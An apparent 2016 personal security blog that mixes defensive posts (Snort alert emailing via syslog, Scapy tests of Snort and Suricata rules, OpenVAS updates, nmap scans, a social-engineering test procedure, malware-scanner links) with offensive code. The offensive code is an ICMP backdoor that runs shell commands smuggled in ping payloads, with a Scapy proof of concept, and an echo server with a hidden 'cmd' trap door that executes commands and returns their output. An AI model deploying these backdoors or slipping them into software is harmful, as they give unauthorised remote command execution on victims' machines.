Alex Huang's Blog: 2016

Monday, December 26, 2016

Send Snort alerts through emails from Syslog

#!/usr/bin/perl -w
#Add the sentence below (bear in mind that there is no Pound sign)
#to /etc/rsyslog.conf before restarting the rsyslog service.
#*.* @127.0.0.1:88
use Net::Syslogd;
use IO::Socket;
$|=1;

$email_server='192.168.0.100';
$email_domain='local.mail.com';
$email_sender='sender@mail.com';
$email_receiver='receiver@mail.com';
$syslogd_port=88;

sub sendmail($$){
$content = shift;
$subject = shift;

$sock = IO::Socket::INET->new(PeerAddr => $email_server,
PeerPort => 25,
Proto => 'tcp') || die "Cannot create Socket!\n";

$sock->send("HELO".$email_domain."\r\n");
$sock->recv($mem, 100, 0);
$sock->send("MAIL FROM: ".$email_sender."\r\n");
$sock->recv($mem, 100, 0);
$sock->send("RCPT TO: ".$email_receiver."\r\n");
$sock->recv($mem, 100, 0);
$sock->send("DATA\r\n");
$sock->recv($mem, 100, 0);
$sock->send("From: ".$email_sender."\r\n");
$sock->send("To: ".$email_receiver."\r\n");
$subject = "Subject: ".$subject."\r\n\r\n";
$sock->send($subject);
$content = $content."\r\n".'.'."\r\n";
$sock->send($content);
$sock->recv($mem, 100, 0);
$sock->send("QUIT\r\n");
$sock->recv($mem, 100, 0);

$sock->close();
}

$syslogd = Net::Syslogd->new(LocalPort=>$syslogd_port) or die "Error creating Syslogd listener: ", Net::Syslogd->error;

while (1) {
$message = $syslogd->get_message();

if (!defined($message)) {
printf "$0: %s\n", Net::Syslogd->error;
exit 1
} elsif ($message == 0) {
next
}

if (!defined($message->process_message())) {
printf "$0: %s\n", Net::Syslogd->error
} else {

$syslog_content = sprintf "%s\t%i\t%s\t%s\t%s\t%s\t%s\n",
$message->remoteaddr,
$message->remoteport,
$message->facility,
$message->severity,
$message->time,
$message->hostname,
$message->message;

#print $syslog_content;

if ($message->message=~/snort(.*): \[(.*)\] (.*) \[Classification:/){
print $syslog_content;
$alert=$3;
&sendmail($syslog_content, $alert);

}
}
}

Sunday, December 11, 2016

An example regarding Scapy scripts

#!/usr/bin/python

from scapy.all import *

ipAddr=raw_input("Target IP : ")

payloadContent=raw_input("Content : ")

packetForTest=IP(dst=ipAddr)/ICMP()/payloadContent

send(packetForTest)

print "Sending the ICMP packet..."

print "Done!"

Test Suricata through Scapy

The configuration of suricata.yaml refers to a new-added rule named alex.rules
root@LinuxTest:~# cat /etc/suricata/suricata.yaml|grep rules
## Step 2: select the rules to enable or disable
default-rule-path: /etc/suricata/rules
- emerging-all.rules
- app-layer-events.rules
- files.rules
- stream-events.rules
- decoder-events.rules
- http-events.rules
- tls-events.rules
- dns-events.rules
#- modbus-events.rules
- smtp-events.rules
- alex.rules

The content of the alex.rules
alert icmp any any -> any any (content:"|64656D6F6E616C6578|"; msg:"Show demonalex"; sid:1000888;)

Run Suricata
root@LinuxTest:~# suricata -c /etc/suricata/suricata.yaml -i eth0

Lauch a test case through Scapy:
>>> b=IP(dst='184.0.172.222')/ICMP()/'demonalex';send(b)
.
Sent 1 packets.

Check the alert of Suricata
root@LinuxTest:~# tail -n 10 -f /var/log/suricata/fast.log
12/11/2016-15:47:22.255835 [**] [1:1000888:0] Show demonalex [**] [Classification: (null)] [Priority: 3] {ICMP} 184.0.1.189:8 -> 184.0.172.222:0
12/11/2016-15:47:22.256266 [**] [1:1000888:0] Show demonalex [**] [Classification: (null)] [Priority: 3] {ICMP} 184.0.172.222:0 -> 184.0.1.189:0

Some notes regarding testing Snort through Scapy

The rule for testing the NIDS engine:
alert icmp any any -> any any (content:"|64656D6F6E616C6578|"; msg:"Show demonalex"; sid:1000888;)

Launch a test case through Scapy:
>>> a=IP(dst='192.168.172.222')/ICMP()/"demonalex"
>>> send(a)

Tcpdump monitoring the conversation:
root@LinuxTest:/etc/snort/rules# tcpdump -i eth0 -Avv host 192.168.172.222 and icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:05:28.450743 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto ICMP (1), length 37)
dynamic.dsl.skybest.com > xxxxxxxxxxx.local: ICMP echo request, id 0, seq 0, length 17
E..%....@.\;...........c....demonalex
15:05:28.451176 IP (tos 0x0, ttl 127, id 21335, offset 0, flags [none], proto ICMP (1), length 37)
xxxxxxxxxxx.local > dynamic.dsl.skybest.com: ICMP echo reply, id 0, seq 0, length 17
E..%SW.................c....demonalex.........

Corresponding Snort Log:
root@LinuxTest:~# tail -n 10 -f /var/log/snort/alert
[**] [1:1000888:0] Show demonalex [**]
[Priority: 0]
12/09-15:23:37.880520 192.168.1.189 -> 192.168.172.222
ICMP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:37
Type:8 Code:0 ID:0 Seq:0 ECHO

[**] [1:1000888:0] Show demonalex [**]
[Priority: 0]
12/09-15:23:37.881118 192.168.172.222 -> 192.168.1.189
ICMP TTL:127 TOS:0x0 ID:3121 IpLen:20 DgmLen:37
Type:0 Code:0 ID:0 Seq:0 ECHO REPLY

[**] [1:408:5] ICMP Echo Reply [**]
[Classification: Misc activity] [Priority: 3]
12/09-15:23:37.881118 192.168.172.222 -> 192.168.1.189
ICMP TTL:127 TOS:0x0 ID:3121 IpLen:20 DgmLen:37
Type:0 Code:0 ID:0 Seq:0 ECHO REPLY

Sunday, December 4, 2016

Officially update feeds for OSSIM or USM.

Directly Quoted from: https://www.alienvault.com/documentation/usm-v5/ids-configuration/updating-alienvault-nids-rules.htm

To install threat intelligence updates using the web interface

Navigate to Configuration > Deployment > Components > AlienVault Center.
Click the yellow arrow in the New Updates column next to the USM appliance you want to install the updates on.
Examine the available updates.

NIDS updates contain “suricata” in the package name.
Click Update Feed Only.

Note: This updates signatures and rules for all packages listed in the update summary, not just the IDS signatures.

The upgrade process can take several minutes. After completion, the page displays a message indicating a successful update.

To install threat intelligence updates in the AlienVault Setup Menu

Launch the AlienVault console.
Select System Preferences; press Enter (<OK>).
Select Update AlienVault System; press Enter (<OK>).
Select Update Threat Intelligence; press Enter (<OK>).
Confirm your selection.

Note: The AlienVault console does not show the list of available updates, but you can check the update progress.

The upgrade process can take several minutes. After completion, the console displays a message indicating a successful update.

Manually update the NVT through Shell

1) Execute the command below in order to update NVT.
root@LinuxTest:~# http_proxy="http://USERNAME:PASSWORD@PROXYIP:PORT/" /usr/sbin/openvas-nvt-sync --wget

2) Restart the Openvasd via executing the following commands so that the new plugins can be reloaded into the scanner.
root@LinuxTest:~# /usr/bin/openvas-stop && /usr/bin/openvas-start
OR:
alienvault:/usr/local/sbin/crond# /usr/bin/killall -HUP openvassd

3) In order to see whether all new plugins have been imported, "ps" command may be utilized.
root@LinuxTest:~# ps -aef|grep open
root     28135     1  0 13:33 ?        00:00:00 openvasmd
root     28152     1 98 13:33 ?        00:01:05 openvassd: Reloaded 50450 of 50527 NVTs (99% / ETA: 00:00)
root     28155 28152  0 13:33 ?        00:00:00 openvassd (Loading Handler)
root     28231 21831  0 13:34 pts/0    00:00:00 grep open

4) Furthermore, as shown in the example below, "openvas-check-setup" can be used to check the status.
root@LinuxTest:~# /usr/bin/openvas-check-setup

Friday, December 2, 2016

Using NMAP to test the Screening functionality within the NetScreen platform.

The nmap command below is able to determine whether or not the Screening functionality works properly.

nmap -v --min-rate 3000 --max-rate 3000 -sS 192.168.0.1-253

Please refer to https://nmap.org/book/man-performance.html to get more details.

Send SYSLOG to remote servers through Snort being hosted on Kali

root@LinuxTest:~# snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.9.7.0 GRE (Build 149)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/contact#team
           Copyright (C) 2014 Cisco and/or its affiliates. All rights reserved.
           Copyright (C) 1998-2013 Sourcefire, Inc., et al.
           Using libpcap version 1.8.1
           Using PCRE version: 8.39 2016-06-14
           Using ZLIB version: 1.2.8


root@LinuxTest:~# cat /etc/rsyslog.conf|grep '*.*'|grep 514|grep -v '#'
*.*                             @192.168.0.1:514

root@LinuxTest:~# cat /etc/snort/snort_syslog.conf|grep syslog|grep -v '#'
output alert_syslog: host=192.168.0.1:514, LOG_LOCAL1 LOG_ALERT

root@LinuxTest:~# ps -aef|grep snort
root      8709     1  0 01:59 ?        00:00:02 /usr/sbin/snort -c /etc/snort/snort_syslog.conf -i eth0 -A full -D -s

P.S.: In this case, 192.168.0.1 is the remote syslogd server. Moreover, after everything above is set, rebooting the system is a must. Otherwise, the rsyslogd may not function properly.

Wednesday, November 16, 2016

Configure the binded IP of OpenVAS

1) Go to the corresponding folder:

cd /lib/systemd/system

2) Change the loopback address to the omnidirectional address:

sed -e 's/127.0.0.1/0.0.0.0/g' greenbone-security-assistant.service openvas-manager.service openvas-scanner.service -i

3) Let the system reload all configuration:

systemctl daemon-reload

4) Restart the corresponding services:

systemctl restart greenbone-security-assistant.service openvas-manager.service openvas-scanner.service

5) Check all ports:

ss -nalt

Monday, October 10, 2016

Utilizing Nmap to launch a vulnerability scanning.

Reference: https://nmap.org/book/nse.html

First, update your NSE database through executing the command below.

nmap --script-updatedb

Second, enable the vulnerability scanning functionality by adding the argument --sC as shown in the following.

nmap -sC 192.168.0.1

A procedure regarding Social Engineering Test in my opinion.

The Social Engineering test’s procedure, which is similar to the technical test, is also composed of five steps, namely Reconnaissance, Confirmation, Implementation, Analysis, Report. Here is the detail of each step:

1) Reconnaissance: Use such social platforms as Google and Linkedin to locate candidates who may be tested targets.

2) Confirmation: Confirm with the client about the tested methodologies and the individuals as tested targets before documenting the test plan. Bear in mind that the precise time frame of the implementation should not be known by the client in advance in order to estimate the client's incident response ability.

3) Implementation: Launch the SE test in accordance with the aforementioned test plan; record every reaction from the targets during the implementation.

4) Analysis: Analyze the reactions. Normally, the incident response team of the client may confirm the situation with the SE team.

5) Report: Document the analysis report after the SE test is done, and submit the report before holding a meeting to discuss the detail regarding the result.

Saturday, October 8, 2016

Free traditional vulnerability scanners

For some reasons, as such Fuzz scanning as SQL Injection scanning and XSS scanning may not be able to be fulfilled, the traditional vulnerability scanning would be more significant so that penetration testers can get as many vulnerabilities regarding targets as possible. There are some free traditional vulnerability scanners' names below.

OpenVAS
Armitage (based on Metasploit Framework)
Sparta (based on Nmap and Nikto)

Wish you audiences could give me more names. Thank you.

Saturday, October 1, 2016

An ICMP backdoor written recently.

#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
import socket, re, sys, subprocess

host = socket.gethostname()

#A sniffer dedicated to ICMP
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))

s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
#A sniffer dedicated to ICMP

while 1:
# receive a package
icmp_packet = s.recvfrom(65535)
ipacket=str(icmp_packet)
#print type(ipacket), ":", ipacket
try:
matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
if matchstr:
#print matchstr.group(1)
command = matchstr.group(1)
subprocess.check_output(command, shell=True)
#print "Executed \'", command, "\'"
except:
print "Execution failed."
continue

# disabled promiscuous mode
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

Friday, September 30, 2016

Multiple Online Anti-Virus and Sandbox

https://www.virustotal.com/

https://www.metadefender.com/#!/scan-file

https://avcaesar.malware.lu/

https://virusscan.jotti.org/

http://www.virscan.org/

https://www.hybrid-analysis.com/

https://mastiff-online.korelogic.com/

https://sandbox.deepviz.com/

Website:

https://global.sitesafety.trendmicro.com/

http://scanurl.net

Behavior Analysis:

https://malwr.com/analysis/

MS Office:

http://www.document-analyzer.net/

Executable Files:

https://www.file-analyzer.net/

APK:

https://www.apk-analyzer.net/

Thursday, September 29, 2016

Simple TCP Scanner

#!/usr/bin/python
# Written in September, 2016 for fun.
import socket, sys

port_list = [7, 8, 9, 21, 22, 23, 80, 135, 139, 443, 445, 1025]

try:
host = sys.argv[1]
except:
host = raw_input("Scanned Host: ")

for port in port_list:
#print port, "\n"
s = socket.socket()
re = s.connect_ex((host, port))
if (re == 0):
print host, ":", port, "is open!"
else:
print host, ":", port, "is closed!"
s.close()

print "Done!"

An echo server with a trap door

#!/usr/bin/python
#Written in August, 2016 with wwiinngd's help
import sys, socket, subprocess, re

s = socket.socket()
host = socket.gethostname()
port = 7
s.bind((host, port))
s.listen(5)
while True:
c, addr = s.accept()
print('Client: ', addr)
while True:
c.send("request (type \"quit\" to quit): ")
request = c.recv(1024)
if (request == "quit\n"):
c.close()
del c
break
#Backdoor function starts
match = re.search(r'^cmd (.*)', request, re.M|re.I)
if match:
request = "test\n"
command = match.group(1)
try:
output = subprocess.check_output(command, shell=True)
c.send(output)
except:
print "Subprocess is malfunctioning."
#Backdoor function ends
print request
c.send("reply: " + request)
s.close()

Tuesday, September 27, 2016

A slide showing how to use general web scanners.